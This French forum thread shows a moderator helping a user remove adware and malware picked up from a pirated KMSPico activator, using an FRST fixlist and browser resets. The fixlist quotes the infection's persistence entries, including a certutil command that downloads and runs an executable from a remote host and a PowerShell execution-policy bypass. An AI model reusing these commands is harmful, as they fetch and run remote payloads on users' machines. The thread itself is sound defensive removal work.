Sujet Précédent Sujet Suivant

Supprimer les Logiciels Malveillants [FRST]

Résolu/Fermé
anasalami18
Messages postés
27
Date d'inscription
mercredi 18 avril 2012
Statut
Membre
Dernière intervention
20 septembre 2020
 - 22 mai 2018 à 18:36
anasalami18
Messages postés
27
Date d'inscription
mercredi 18 avril 2012
Statut
Membre
Dernière intervention
20 septembre 2020
 - 23 mai 2018 à 15:16
Bonjour tout le monde,
je naviguais aujourd’hui sur internet et maladroitement j'ai installer une application et depuis impossible d'utiliser mon PC sans être interpellé par des publicités et aussi l'ordinateur a perdu de sa vitesse!
en plus de ça, j ai remarqué beaucoup de logiciels installés tout seul que je désinstalle et après le prochain redémarrage ça se réinstalle tout seul!
j'ai analyser mon pc grâce à FRST je vous passe les 2 rapports:
FRST.txt : https://drive.google.com/file/d/10pkDE4HszKYJsFDeKMCRY55At4J4zGIs/view?usp=drive_open
Addition.txt : https://drive.google.com/file/d/1K3prU1larntn51tTQu5OGXjouXAi5rkE/view?usp=drive_open

Puis-je avoir, s'il vous plait, une fixlist.txt pour remédier a ce problème qui me pourri ma navigation ? :p
une Question secondaire : pouvez-vous me dire comment créer sa fixlist tout seul comme un grand ou est-ce quelque chose assez compliqué qui n'est maîtrisé que par des professionnelles ?
Merci d'avance!

1 réponse

Réponse 1 / 1
Malekal_morte-
Messages postés
180254
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
26 mars 2021
 24 556
Modifié le 22 mai 2018 à 22:39
Salut,

Tu as infecté ton ordinateur en téléchargeant un KMSPico vérolé, c'est tout.


Tu as des programmes qui ont été installés à l'achat de l'ordinateur ou installés par la suite et qui sont pas forcément utiles.
Ils encombrent Windows et peuvent le ralentir.
Tu peux donc les désinstaller.
Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Désinstalle :

CCleaner
Java


PS : CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Si tu veux le garder, désactive la surveillance de CCleaner, inutile, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : https://www.malekal.com/supprimer-ccleaner-demarrage-windows/


Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci. 

CreateRestorePoint:
CloseProcesses:
Task: {0678EE0F-BEDA-4641-BD03-59292A121FAF} - System32\Tasks\TUZwhpCbnzWcBoUhWSI2 => rundll32 "C:\Program Files (x86)\SvnSzzIscGyUC\QSgRJsQ.dll",#1
Task: {25F27FFE-70A8-4AF1-97DE-44D31DC2E055} - System32\Tasks\update64 => C:\Program Files\SystemaRev\RevServicesX\updaterev.exe [2018-05-13] (SystemaRev)
Task: {3E9DFE6B-E830-4D59-814E-CC58A5AE0690} - System32\Tasks\jbDyCmJOWCzWzi => rundll32 "C:\Program Files (x86)\EPVqpVJyVSWU2\NULQOAlpVdpRy.dll",#1
Task: {40F08777-5594-4F58-9A7D-4ADA0F941EB7} - System32\Tasks\iprsl => C:\Users\anasa\AppData\Roaming\gwdbd\iprsl.vbs [2018-05-22] ()
Task: {41D646DE-2C02-4C2B-967B-D5AB617E6886} - System32\Tasks\RuvZlWnxKNkmGuM2 => rundll32 "C:\Program Files (x86)\KCGHGVOnU\UQApdR.dll",#1
Task: {42BC45C7-FCE2-4A4F-9F4A-122918E35E4A} - \Microsoft\Windows\UNP\RunCampaignManager -> Pas de fichier <==== ATTENTION
Task: {A14F74C2-D913-4A6B-B1BF-4836D5E252C6} - System32\Tasks\FastDataX Task => C:\Program Files (x86)\FastDataX\FastDataX.exe [2018-04-23] () <==== ATTENTION
Task: {B0BFA06D-1E4A-457A-B5C5-1DEE7CB8A400} - System32\Tasks\MainPM => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {B684FCB6-E5F5-4BFE-B94C-1553E95B06FF} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [2018-05-22] () <==== ATTENTION
Task: {B8639995-F9B6-4664-B6B0-3DA47590EEF6} - System32\Tasks\wAJDAAZgOBCdyQgsK2 => rundll32 "C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR\Rtfsvpr.dll",#1
Task: {B909B22E-29FC-4438-A53D-4206FB2E8F35} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\AnasAlamiIdrissi\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\AnasAlamiIdrissi\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {BA90E863-7F5B-447C-B546-B21442BBC8CD} - System32\Tasks\dilis-com Desktop Walker => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\dilis.com Desktop Walker\dilis.com Desktop Walker.dll",UijVTl
Task: {BA94F428-B400-402B-A704-2476F0499057} - System32\Tasks\System Healer Delayed => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2018-04-11] () <==== ATTENTION
Task: {BE1EC88C-306F-457D-81DF-597C7AF3EAD3} - System32\Tasks\System Healer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe [2018-04-11] () <==== ATTENTION
HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [190 2018-05-10] ()
HKLM-x32\...\Run: [Multitimer] => C:\Program Files (x86)\Multitimer\Multitimer.exe [281600 2017-12-12] ()
HKLM\...\RunOnce: [OMEWPRODUCT_] => C:\Program Files\KMSpico\MPIMR2WXWYA117CL6\7çA#IVçA33.exe [312320 2018-05-22] ()
HKLM\...\RunOnce: [ksjwodsqrtb] => C:\Program Files (x86)\Lberah\1938750.exe [670208 2018-05-22] ()
HKU\S-1-5-21-2540753990-2721129783-980396016-1001\...\Run: [&h62FLRTms.exe] => C:\Program Files\KMSpico\MPIMR2WXWYA117CL6\&h62FLRTms.exe [394240 2018-05-22] ()
HKU\S-1-5-21-2540753990-2721129783-980396016-1001\...\Run: [StillTree] => C:\WINDOWS\rss\csrss.exe [3172864 2018-05-22] () <==== ATTENTION
HKU\S-1-5-21-2540753990-2721129783-980396016-1001\...\Run: [5251288] => C:\Users\anasa\AppData\Roaming\3p1pvkfx4rj\e0mjsjhcfiy.exe [720146 2018-05-22] ( )
HKU\S-1-5-21-2540753990-2721129783-980396016-1001\...\Run: [5a712307fa1e2cbcc5e79fcd80d9f09d] => C:\Users\anasa\AppData\Local\Temp\systm.exe .. [143360 2018-05-22] () <==== ATTENTION
HKU\S-1-5-21-2540753990-2721129783-980396016-1001\...\Run: [BSX81OBRSLZ554Q] => C:\Program Files\QDZV0JL311\NV0BGLTPT.exe [666624 2018-05-22] (5X2605LLN)
HKU\S-1-5-21-2540753990-2721129783-980396016-1001\...\Run: [4735473] => C:\Users\anasa\AppData\Roaming\mv3ypb11p5n\txpfcwnx3uq.exe [720146 2018-05-22] ( )
S3 update64; C:\Program Files\SystemaRev\RevServicesX\updaterev.exe [594432 2018-05-13] (SystemaRev) [Fichier non signé]
 ssh-agent; C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [495616 2018-03-10] ()
S2 MicroService; C:\Users\anasa\AppData\Local\XService\XService.dll [X]
R2 TCPSvc; "C:\Users\AnasAlamiIdrissi\AppData\Local\Temp\csrss\proxy\Tor\tor.exe" --nt-service --SocksPort 7050 --Log "notice file C:\Users\AnasAlamiIdrissi\AppData\Local\Temp\csrss\proxy\t" <==== ATTENTION
2018-05-22 17:16 - 2018-05-22 17:17 - 000000040 _____ C:\Program Files (x86)\settings.dat
2018-05-22 17:16 - 2018-05-22 17:16 - 000000000 ____D C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR
2018-05-22 17:16 - 2018-05-22 17:16 - 000000000 ____D C:\Program Files (x86)\SvnSzzIscGyUC
2018-05-22 17:16 - 2018-05-22 17:16 - 000000000 ____D C:\Program Files (x86)\reports
2018-05-22 17:16 - 2018-05-22 17:16 - 000000000 ____D C:\Program Files (x86)\NExnNAYCpUUn
2018-05-22 17:16 - 2018-05-22 17:16 - 000000000 ____D C:\Program Files (x86)\KCGHGVOnU
2018-05-22 17:16 - 2018-05-22 17:16 - 000000000 ____D C:\Program Files (x86)\JAcqddADqIE
2018-05-22 17:16 - 2018-05-22 17:16 - 000000000 ____D C:\Program Files (x86)\EPVqpVJyVSWU2
2018-05-22 17:15 - 2018-05-22 17:15 - 003451904 ____H C:\WINDOWS\windefender.exe
2018-05-22 17:15 - 2018-05-22 17:15 - 000003484 _____ C:\WINDOWS\System32\Tasks\System Healer Monitor
2018-05-22 17:15 - 2018-05-22 17:15 - 000003476 _____ C:\WINDOWS\System32\Tasks\System Healer Delayed
2018-05-22 17:15 - 2018-05-22 17:15 - 000001214 _____ C:\Users\anasa\Desktop\Crossout - MMO action game.lnk
2018-05-22 17:15 - 2018-05-22 17:15 - 000001200 _____ C:\Users\anasa\Desktop\Driver Updater.lnk
2018-05-22 17:15 - 2018-05-22 17:15 - 000001015 _____ C:\Users\anasa\Desktop\Launch System Healer.lnk
2018-05-22 17:15 - 2018-05-22 17:15 - 000000000 ____D C:\Users\anasa\AppData\Roaming\System Healer
2018-05-22 17:15 - 2018-05-22 17:15 - 000000000 ____D C:\Users\anasa\AppData\Roaming\EpicNet Inc
2018-05-22 17:15 - 2018-05-22 17:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2018-05-22 17:15 - 2018-05-22 17:15 - 000000000 ____D C:\ProgramData\97f29a35-8705-47de-97b4-45277a5a7676
2018-05-22 17:15 - 2018-05-22 17:15 - 000000000 ____D C:\ProgramData\5ef56cd9-83de-4b9a-9c95-e64c97565d3e
2018-05-22 17:15 - 2018-05-22 17:15 - 000000000 ____D C:\Program Files (x86)\SystemHealer
2018-05-22 17:14 - 2018-05-22 17:14 - 000003696 _____ C:\WINDOWS\System32\Tasks\FastDataX Task
2018-05-22 17:14 - 2018-05-22 17:14 - 000000000 ____D C:\Users\anasa\AppData\Roaming\SystemHealer
2018-05-22 17:14 - 2018-05-22 17:14 - 000000000 ____D C:\Users\anasa\AppData\Roaming\FastDataX
2018-05-22 17:14 - 2018-05-22 17:14 - 000000000 ____D C:\Program Files (x86)\FastDataX
2018-05-22 17:13 - 2018-05-22 17:16 - 000003212 _____ C:\WINDOWS\System32\Tasks\jbDyCmJOWCzWzi
2018-05-22 17:13 - 2018-05-22 17:16 - 000003034 _____ C:\WINDOWS\System32\Tasks\wAJDAAZgOBCdyQgsK2
2018-05-22 17:13 - 2018-05-22 17:16 - 000003026 _____ C:\WINDOWS\System32\Tasks\TUZwhpCbnzWcBoUhWSI2
2018-05-22 17:13 - 2018-05-22 17:16 - 000003008 _____ C:\WINDOWS\System32\Tasks\RuvZlWnxKNkmGuM2
2018-05-22 17:13 - 2018-05-22 17:13 - 000003672 _____ C:\WINDOWS\System32\Tasks\ScheduledUpdate
2018-05-22 17:13 - 2018-05-22 17:13 - 000000000 ___HD C:\WINDOWS\rss
2018-05-22 17:13 - 2018-05-22 17:13 - 000000000 ____D C:\Users\anasa\AppData\Roaming\WidModule
2018-05-22 17:13 - 2018-03-24 14:51 - 002990080 _____ C:\WINDOWS\system32\mcicda64.dll
2018-05-22 17:12 - 2018-05-22 17:13 - 000000000 ____D C:\Users\anasa\AppData\Roaming\mv3ypb11p5n
2018-05-22 17:12 - 2018-05-22 17:13 - 000000000 ____D C:\Program Files\QDZV0JL311
2018-05-22 17:12 - 2018-05-22 17:12 - 000011568 _____ C:\Users\anasa\AppData\Local\InstallationConfiguration.xml
2018-05-22 17:12 - 2018-05-22 17:12 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-22 17:11 - 2018-05-22 17:11 - 000000290 __RSH C:\Users\anasa\ntuser.pol
2018-05-22 17:06 - 2018-05-22 17:07 - 007271632 _____ (Malwarebytes) C:\Users\anasa\Desktop\adwcleaner_7.1.1.exe
2018-05-22 16:55 - 2018-05-22 16:55 - 003587089 _____ C:\Users\anasa\Desktop\KMSpico 11 FINAL (Office and Windows 10+8+7 Activator).zip
2018-05-22 16:50 - 2018-05-22 16:50 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-22 16:49 - 2018-05-22 17:15 - 000003872 _____ C:\WINDOWS\System32\Tasks\MainPM
2018-05-22 16:49 - 2018-05-22 17:15 - 000003870 _____ C:\WINDOWS\System32\Tasks\update64
2018-05-22 16:49 - 2018-05-22 16:49 - 000016874 _____ C:\WINDOWS\System32\Tasks\dilis-com Desktop Walker
2018-05-22 16:47 - 2018-05-22 16:47 - 000000000 ____D C:\Users\anasa\AppData\Roaming\3p1pvkfx4rj
2018-05-22 16:47 - 2018-05-22 16:47 - 000000000 ____D C:\Users\anasa\AppData\LocalLow\iAiaDuTGfHtGg
2018-05-22 16:47 - 2018-05-22 16:47 - 000000000 ____D C:\Program Files\GM001KEU9T
2018-05-22 16:46 - 2018-05-22 17:15 - 000002648 __RSH C:\ProgramData\ntuser.pol
2018-05-22 16:46 - 2018-05-22 16:46 - 000000000 ____D C:\Program Files\My Program
2018-05-22 16:46 - 2018-05-22 16:46 - 000000000 ____D C:\Program Files (x86)\Multitimer
2018-05-22 16:45 - 2018-05-22 17:13 - 000003314 _____ C:\WINDOWS\System32\Tasks\csrss
2018-05-22 16:45 - 2018-05-22 16:45 - 000000000 ____D C:\Users\AnasAlamiIdrissi
2018-05-22 16:45 - 2018-05-22 16:45 - 000000000 ____D C:\Program Files (x86)\Lberah
2018-05-22 16:44 - 2018-05-22 17:14 - 000929792 _____ C:\Users\anasa\AppData\Local\sham.db
2018-05-22 16:44 - 2018-05-22 16:44 - 000140800 _____ C:\Users\anasa\AppData\Local\installer.dat
2018-05-22 16:42 - 2018-05-22 16:42 - 000003354 _____ C:\WINDOWS\System32\Tasks\iprsl
2018-05-22 16:42 - 2018-05-22 16:42 - 000000000 ____D C:\Users\anasa\AppData\Roaming\gwdbd
2018-05-22 16:42 - 2018-05-22 16:42 - 000000000 ____D C:\Program Files (x86)\KMSPico 10.2.1 Final
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Enregistre le contenu par le menu fichier puis enregistrer.

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.



2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, si tu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.



1
anasalami18
Messages postés
27
Date d'inscription
mercredi 18 avril 2012
Statut
Membre
Dernière intervention
20 septembre 2020
Modifié le 23 mai 2018 à 04:19
Bonsoir,
J'ai suivi toutes vos instructions, les logiciels malveillants ont été désinstallés avec succès . Par contre les publicités dans le navigateur (Google Chrome ) s'affichent toujours!
Voici les 2 rapports demandés:
FRST.txt : https://pjjoint.malekal.com/files.php?id=FRST_20180523_w13s7x13e6e6
Addition.txt :https://pjjoint.malekal.com/files.php?id=20180523_m10c6s7z14f12
Merci et bonne soirée!
0
Malekal_morte-
Messages postés
180254
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
26 mars 2021
 24 556 > anasalami18
Messages postés
27
Date d'inscription
mercredi 18 avril 2012
Statut
Membre
Dernière intervention
20 septembre 2020
23 mai 2018 à 08:15
as-tu bien réinitialisé Chrome ?

si oui :

Réinstalle proprement Google Chrome, en suivant exactement cette procédure : Réparer et réinstaller proprement Google Chrome
(Si tu as un compte synchronisé, lire le paragraphe suivant).
0
anasalami18
Messages postés
27
Date d'inscription
mercredi 18 avril 2012
Statut
Membre
Dernière intervention
20 septembre 2020
23 mai 2018 à 15:16
ça Marche merci BEAUCOUP!
0